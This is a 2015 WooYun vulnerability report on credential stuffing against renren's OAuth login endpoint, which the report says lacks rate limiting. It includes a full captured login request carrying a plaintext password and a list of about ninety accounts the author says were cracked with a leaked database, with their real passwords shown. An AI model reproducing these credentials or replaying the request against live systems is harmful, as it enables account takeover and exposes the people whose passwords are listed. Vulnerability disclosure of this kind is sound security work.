乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-08: 细节已通知厂商并且等待厂商处理中 2015-05-08: 厂商已经确认,细节仅向厂商公开 2015-05-18: 细节向核心白帽子及相关领域专家公开 2015-05-28: 细节向普通白帽子公开 2015-06-07: 细节向实习白帽子公开 2015-06-22: 细节向公众公开
撞库扫号攻击已经是Top 10 Security Risks for 2014之一.撞库泄露用户隐私
三方认证的登录接口没有防御撞库。对登录接口的调用没有进行限制。经过测试发现,使用某泄露数据库可以碰撞获得大量有效的登录账号。 登录接口抓包如下:https://graph.renren.com/oauth/grant
POST /oauth/grant HTTP/1.1Host: graph.renren.comConnection: closeContent-Length: 811Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://graph.renren.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://graph.renren.com/oauth/grant?client_id=6f74c7e44b824432835e70f0544013fb&redirect_uri=http%3A%2F%2Fpassport.baidu.com%2Fphoenix%2Faccount%2Fafterauth%3Fmkey%3D5fec5f70f3097022b2d86c338568de29&response_type=code&display=page&scope=publish_share+create_album+photo_upload+publish_blog+publish_checkin+publish_comment+publish_feed+read_user_album+read_user_blog+read_user_checkin+read_user_comment+read_user_feed+read_user_guestbook+read_user_invitation+read_user_like_history+read_user_message+read_user_notification+read_user_photo+read_user_status+send_invitation+send_message+status_update+write_guestbook&state=&secure=true&origin=00000&username=ddddd&error_code=4Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: anonymid=i9ea6gwi-brfc4d; depovince=GW; _r01_=1; __utma=151146938.1916745302.1431010087.1431010087.1431010087.1; __utmc=151146938; __utmz=151146938.1431010087.1.1.utmcsr=renren.com|utmccn=(referral)|utmcmd=referral|utmcct=/SysHome.do; jebe_key=e35dab7c-5844-44a6-82b9-e656fbb5b82f%7C0083196e9ea7095a9b38cfdeb7d12861%7C1431010451205%7C1%7C1431010452089; first_login_flag=1; loginfrom=syshome; [email protected]; ln_hurl=http://hdn.xnimg.cn/photos/hdn521/20101109/2035/h_main_CXTM_2765000203bd2f75.jpg; jebecookies=40809c3b-2866-4ffb-a1b6-d70d40ea1ee4|||||; ick_login=77c42c1e-88cf-42de-ba77-326369bd0865; ick=9601b7e3-6d26-4d07-97d9-9280d9945d4bRA-Ver: 2.10.0RA-Sid: 7B9DD012-20150303-080129-82895f-fb68a9AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3login_type=false&username=huanlingyun_1984@163%2ecom&password=19840801&icode=&isNeedIcode=&authFeed=true&follow=true&porigin=80100&redirect_uri=http%3A%2F%2Fpassport.baidu.com%2Fphoenix%2Faccount%2Fafterauth%3Fmkey%3D5fec5f70f3097022b2d86c338568de29&client_id=6f74c7e44b824432835e70f0544013fb&response_type=code&scope=publish_share+create_album+photo_upload+publish_blog+publish_checkin+publish_comment+publish_feed+read_user_album+read_user_blog+read_user_checkin+read_user_comment+read_user_feed+read_user_guestbook+read_user_invitation+read_user_like_history+read_user_message+read_user_notification+read_user_photo+read_user_status+send_invitation+send_message+status_update+write_guestbook&state=&display=page&post_form_id=98ac067daf88e93c580b747c6b3e9123-30-1431053111294&authorizeOrigin=00000&secure=true
经过测试发现,使用某泄露数据库可以碰撞获得大量有效的登录账号.由于之前没有保存记录。又跑了一次。大部分账号都触发锁定策略了。。跑了一万5成功7百多,可见renren注册会员还是相当多啊。
[email protected] xq19900809[email protected] Yang5845211314[email protected] 124052338[email protected] 1301248118[email protected] qushuliang0426[email protected] 11091109[email protected] woaimama[email protected] zhanggeorge[email protected] ag127val[email protected] zzzhui123[email protected] smilernihao[email protected] zyqnihao1314521[email protected] becky362329[email protected] 5211314319[email protected] wuyi8702[email protected] qq123456[email protected] yfj827319[email protected] 11111111[email protected] qiaolin911[email protected] wangshuo[email protected] caidianying[email protected] maomao41421[email protected] zhongai13[email protected] 59305611[email protected] 124592203[email protected] 85481076[email protected] s@iDream[email protected] up369com[email protected] qpl1qpl1[email protected] 258468895[email protected] 13580617139[email protected] huang55431[email protected] 813813813[email protected] 83030545[email protected] 11709352[email protected] 27821195[email protected] 85918725lovejin[email protected] 19860623[email protected] 19770722[email protected] zhz13934157016[email protected] 13469847409[email protected] 19820920[email protected] 19871208[email protected] sandy1234[email protected] yangjia1234[email protected] 19820809[email protected] 87831411[email protected] 072324aa[email protected] 6633270692[email protected] 19850416[email protected] 87334967[email protected] shengri19880515[email protected] cyxcxycyx4321[email protected] cheng911[email protected] qiang477577[email protected] 526201344[email protected] luocan16816888[email protected] 198552200[email protected] wei195411[email protected] 0126530334yxx[email protected] LWZL139791[email protected] sy2180836[email protected] 2199kaixinxiaoyu[email protected] 24248423[email protected] n19880308n[email protected] zygy564335[email protected] 198610102418[email protected] 159357qtoetu[email protected] kamendeqing1984[email protected] 58929176[email protected] 15849064661qzm[email protected] lubingquan[email protected] 19086763[email protected] 153998056ding[email protected] a34416912[email protected] 79981134[email protected] qq63426084[email protected] wanqin210[email protected] hejiafeng98[email protected] snaketop[email protected] ba0630ham[email protected] 13972688068[email protected] liujia19891127[email protected] zxcvb123[email protected] abiange2009[email protected] qiujin5201314[email protected] jia368495[email protected] liuzhe123[email protected] zhuchiju[email protected] 19870623zyl[email protected] 27930333[email protected] lw198718[email protected] 13887295120lya
撞库防御参考资料:http://stayliv3.github.io/2015/04/15/%E6%92%9E%E5%BA%93%E6%94%BB%E5%87%BB%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88/
危害等级:中
漏洞Rank:6
确认时间:2015-05-08 13:21
谢谢,非常感谢!
暂无